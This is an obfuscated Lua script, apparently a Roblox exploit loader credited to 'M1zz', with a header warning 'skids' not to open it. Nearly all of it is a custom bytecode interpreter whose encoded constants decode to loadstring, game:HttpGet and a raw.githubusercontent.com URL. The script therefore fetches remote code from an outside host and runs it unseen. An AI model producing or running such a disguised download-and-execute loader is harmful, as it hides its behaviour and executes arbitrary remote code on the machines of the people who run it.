--[[
  _______      / |     _______
 |       \    /  |     |      \
 |        |  /   |     |       |
 |_______/  /____|___  |       |
 |   \           |     |       |
 |    \          |     |       |
 |     \         |     |______/
 
 By M1zz
]]--

--You Don't Have To Open This SKID!!!
--Do Not Skid!
local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v79=0;local v80;while true do if (v79==0) then v80=v2(v0(v30,16));if v19 then local v103=0;local v104;while true do if (v103==0) then v104=v5(v80,v19);v19=nil;v103=1;end if (v103==1) then return v104;end end else return v80;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/((5 -3)^(v32-(2 -1))))%(((1640 -(1523 + 114)) -1)^(((v33-(2 -1)) -(v32-((558 + 62) -(555 + (91 -27))))) + (932 -(857 + 74)))) ;return v81-(v81%((1634 -(68 + 997)) -(367 + 201))) ;else local v82=927 -((1484 -(226 + 1044)) + 713) ;local v83;while true do if (v82==(0 + 0)) then v83=2^(v32-1) ;return (((v31%(v83 + v83))>=v83) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==((705 + 253) -(892 + (258 -193)))) then return (v41 * (40022563 -23245347)) + (v40 * ((122090 -(802 + 150)) -55602)) + (v39 * (469 -213)) + v38 ;end if (v37==(350 -(87 + 263))) then v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;v37=2 -1 ;end end end local function v24() local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1,36 -16 ) * (((29 -22) -5)^(474 -(416 + 26)))) + v42 ;local v46=v20(v43,16 + 5 ,1028 -(915 + 82) );local v47=((v20(v43,32)==(2 -1)) and  -(1 + 0 + 0)) or (1 -0) ;if (v46==(1187 -(1069 + 118))) then if (v45==(0 -0)) then return v47 * (0 -0) ;else v46=(3 -2) + 0 ;v44=0 + 0 ;end elseif (v46==((12911 -9275) -1589)) then return ((v45==(0 + 0)) and (v47 * ((1139 -(116 + 1022))/0))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(368 + 423)) ) * (v44 + (v45/((6 -4)^52))) ;end local function v25(v48) local v49=859 -(814 + 45) ;local v50;local v51;while true do if ((4 -2)==v49) then v51={};for v91=1, #v50 do v51[v91]=v2(v1(v3(v50,v91,v91)));end v49=14 -11 ;end if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=887 -(261 + 624) ;end if (v49==(4 -1)) then return v6(v51);end if (v49==(766 -(745 + 21))) then v50=nil;if  not v48 then v48=v23();if (v48==(1080 -(1020 + 60))) then return "";end end v49=1424 -((1733 -1103) + 793) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v52~=(1837 -(274 + 1561))) then else for v93= #"]",v23() do local v94=(function() return 0 -0 ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v94~=(1 + 0)) then else while true do if (v95==(241 -(187 + 54))) then v96=(function() return v21();end)();if (v20(v96, #"}", #"/")==(780 -(162 + 618))) then local v143=(function() return 0;end)();local v144=(function() return;end)();local v145=(function() return;end)();local v146=(function() return;end)();local v147=(function() return;end)();while true do if (v143==2) then while true do if (v144== #"91(") then if (v20(v146, #"xnx", #"-19")== #" ") then v147[ #".com"]=(function() return v58[v147[ #"http"]];end)();end v53[v93]=(function() return v147;end)();break;end if (v144==(2 + 0)) then local v170=(function() return 0;end)();while true do if (v170==0) then if (v20(v146, #"<", #":")== #"]") then v147[2 + 0 ]=(function() return v58[v147[3 -1 ]];end)();end if (v20(v146,2 -0 ,1 + 1 )~= #"[") then else v147[ #"19("]=(function() return v58[v147[ #"19("]];end)();end v170=(function() return 1637 -(1373 + 263) ;end)();end if (v170==(1001 -(451 + 549))) then v144=(function() return  #"xxx";end)();break;end end end if (v144==0) then local v171=(function() return 0 + 0 ;end)();local v172=(function() return;end)();while true do if (0~=v171) then else v172=(function() return 0 -0 ;end)();while true do if ((0 -0)==v172) then v145=(function() return v20(v96,1386 -(746 + 638) , #"nil");end)();v146=(function() return v20(v96, #"0313",6);end)();v172=(function() return 1 + 0 ;end)();end if ((1 -0)==v172) then v144=(function() return  #">";end)();break;end end break;end end end if (v144== #"~") then local v173=(function() return 341 -(218 + 123) ;end)();while true do if (v173==0) then v147=(function() return {v22(),v22(),nil,nil};end)();if (v145==0) then local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177==0) then v178=(function() return 0;end)();while true do if (v178~=(1581 -(1535 + 46))) then else v147[ #"asd"]=(function() return v22();end)();v147[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v145== #"~") then v147[ #"asd"]=(function() return v23();end)();elseif (v145==(2 + 0)) then v147[ #"19("]=(function() return v23() -((1 + 1)^16) ;end)();elseif (v145~= #"nil") then else local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183==(560 -(306 + 254))) then v184=(function() return 0;end)();while true do if (v184==0) then v147[ #"-19"]=(function() return v23() -(2^(1 + 15)) ;end)();v147[ #"0313"]=(function() return v22();end)();break;end end break;end end end v173=(function() return 1 -0 ;end)();end if (v173==(1468 -(899 + 568))) then v144=(function() return 2;end)();break;end end end end break;end if (v143==1) then local v163=(function() return 0 + 0 ;end)();local v164=(function() return;end)();while true do if (v163==(0 -0)) then v164=(function() return 603 -(268 + 335) ;end)();while true do if (v164==(290 -(60 + 230))) then v146=(function() return nil;end)();v147=(function() return nil;end)();v164=(function() return 1;end)();end if (v164==(573 -(426 + 146))) then v143=(function() return 2;end)();break;end end break;end end end if (v143~=(0 + 0)) then else v144=(function() return 1456 -(282 + 1174) ;end)();v145=(function() return nil;end)();v143=(function() return 812 -(569 + 242) ;end)();end end end break;end end break;end if (v94==(0 -0)) then local v105=(function() return 0;end)();local v106=(function() return;end)();while true do if ((0 + 0)==v105) then v106=(function() return 0;end)();while true do if (v106~=0) then else v95=(function() return 1024 -(706 + 318) ;end)();v96=(function() return nil;end)();v106=(function() return 1252 -(721 + 530) ;end)();end if (v106==1) then v94=(function() return 1;end)();break;end end break;end end end end end for v97= #":",v23() do v54[v97-#" " ]=(function() return v28();end)();end return v56;end if ( #">"~=v52) then else local v87=(function() return 1271 -(945 + 326) ;end)();local v88=(function() return;end)();while true do if (v87==(0 -0)) then v88=(function() return 0;end)();while true do if (v88~=1) then else for v108= #"[",v57 do local v109=(function() return 0 + 0 ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if ((701 -(271 + 429))==v109) then v112=(function() return nil;end)();while true do if (v110==0) then local v165=(function() return 0;end)();while true do if (v165==1) then v110=(function() return 1;end)();break;end if (v165~=(0 + 0)) then else v111=(function() return v21();end)();v112=(function() return nil;end)();v165=(function() return 1;end)();end end end if (1==v110) then if (v111== #"[") then v112=(function() return v21()~=(1500 -(1408 + 92)) ;end)();elseif (v111==2) then v112=(function() return v24();end)();elseif (v111~= #"19(") then else v112=(function() return v25();end)();end v58[v108]=(function() return v112;end)();break;end end break;end if (v109~=0) then else v110=(function() return 1086 -(461 + 625) ;end)();v111=(function() return nil;end)();v109=(function() return 1;end)();end end end v56[ #"nil"]=(function() return v21();end)();v88=(function() return 1290 -(993 + 295) ;end)();end if ((1 + 1)==v88) then v52=(function() return 2;end)();break;end if (v88==0) then v57=(function() return v23();end)();v58=(function() return {};end)();v88=(function() return 1172 -(418 + 753) ;end)();end end break;end end end if (v52~=0) then else local v89=(function() return 0 + 0 ;end)();local v90=(function() return;end)();while true do if (0~=v89) then else v90=(function() return 0;end)();while true do if (v90~=(1 + 0)) then else v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v90=(function() return 2;end)();end if (v90==(1 + 1)) then v52=(function() return  #"\\";end)();break;end if (v90~=0) then else v53=(function() return {};end)();v54=(function() return {};end)();v90=(function() return 530 -(406 + 123) ;end)();end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[1770 -(1749 + 20) ];local v63=v59[1 + 1 ];local v64=v59[1325 -(1249 + 73) ];return function(...) local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1 + 0 ;local v70= -(1 + 0);local v71={};local v72={...};local v73=v12("#",...) -((488 + 658) -(466 + 679)) ;local v74={};local v75={};for v84=0 -0 ,v73 do if ((v84>=v67) or (4372==1850)) then v71[v84-v67 ]=v72[v84 + (2 -1) ];else v75[v84]=v72[v84 + (1901 -(106 + 1794)) ];end end local v76=(v73-v67) + 1 + 0 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1 + 0 ];if ((232<821) and (v78<=(17 -(7 + 4)))) then if ((518<902) and (v78<=(5 -3))) then if (v78<=(114 -(4 + 110))) then do return;end elseif (v78==(585 -(57 + 527))) then v75[v77[1429 -((88 -47) + 1386) ]]=v61[v77[106 -(17 + 86) ]];else v75[v77[(5 -3) + 0 ]]();end elseif (v78<=(8 -4)) then if (v78==((17 -9) -5)) then local v115=v77[168 -(122 + 44) ];local v116,v117=v68(v75[v115](v13(v75,v115 + (1 -0) ,v77[9 -6 ])));v70=(v117 + v115) -1 ;local v118=0 + 0 ;for v140=v115,v70 do v118=v118 + 1 + 0 ;v75[v140]=v116[v118];end else do return;end end elseif (v78==(10 -5)) then v75[v77[67 -(30 + 35) ]]=v77[3 + 0 ];else v75[v77[2]]=v61[v77[1260 -(1043 + 63 + 151) ]];end elseif (v78<=(33 -24)) then if (v78<=7) then v75[v77[1214 -(323 + 889) ]]();elseif ((2994>858) and (v78>(21 -13))) then local v123=580 -(361 + (1058 -839)) ;local v124;local v125;while true do if (v123==1) then v75[v124 + (321 -(53 + (1020 -(239 + 514)))) ]=v125;v75[v124]=v125[v77[1 + 2 + 1 ]];break;end if (v123==(413 -(15 + (1727 -(797 + 532))))) then v124=v77[2];v125=v75[v77[985 -(18 + 964) ]];v123=3 -2 ;end end else v75[v77[2 + 0 ]]=v77[2 + 1 + 0 ];end elseif ((v78<=11) or (3755<=915)) then if ((3946>3743) and (v78>(860 -(20 + 830)))) then local v128=0;local v129;local v130;while true do if ((v128==(1 + 0)) or (1335>=3306)) then v75[v129 + (127 -(116 + 10)) ]=v130;v75[v129]=v130[v77[2 + 2 ]];break;end if (v128==(0 + 0)) then v129=v77[740 -(542 + 196) ];v130=v75[v77[6 -(6 -3) ]];v128=(1203 -(373 + 829)) + 0 ;end end else local v131=0 + 0 ;local v132;local v133;local v134;local v135;while true do if ((4844>2253) and (v131==(1 + 0))) then v70=(v134 + v132) -1 ;v135=0 -0 ;v131=4 -2 ;end if (v131==0) then v132=v77[2];v133,v134=v68(v75[v132](v13(v75,v132 + (1552 -(1126 + 425)) ,v77[408 -(118 + 287) ])));v131=3 -2 ;end if (v131==(1123 -((849 -(476 + 255)) + 1003))) then for v161=v132,v70 do local v162=1130 -(369 + 761) ;while true do if (v162==((0 + 0) -(0 -0))) then v135=v135 + (378 -(142 + 235)) ;v75[v161]=v133[v135];break;end end end break;end end end elseif (v78>12) then local v136=0;local v137;while true do if (v136==(0 -0)) then v137=v77[1 + 1 ];v75[v137]=v75[v137](v13(v75,v137 + ((1853 -875) -(553 + 424)) ,v70));break;end end else local v138=v77[240 -(64 + 174) ];v75[v138]=v75[v138](v13(v75,v138 + 1 ,v70));end v69=v69 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403E33O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F557365723339343834383338393239333934383338393239322F332D5F2D5F2D3938343834382D5F2D312O3833323932303239333933392D5F2D5F2D5F2D2F6D61696E2F2532332825324225323425324225323438313932383437215F21252O32215F38333932383337333732372533422532345F2533422125323428253233253242252O322D252O32282534302952344429253234285F425939323932294D312O5A2O303129253234285F2532332825323328322O393239322532423239323900083O0012013O00013O001201000100023O002009000100010003001208000300044O0003000100034O000C5O00022O00073O000100012O00043O00017O00",v9(),...);
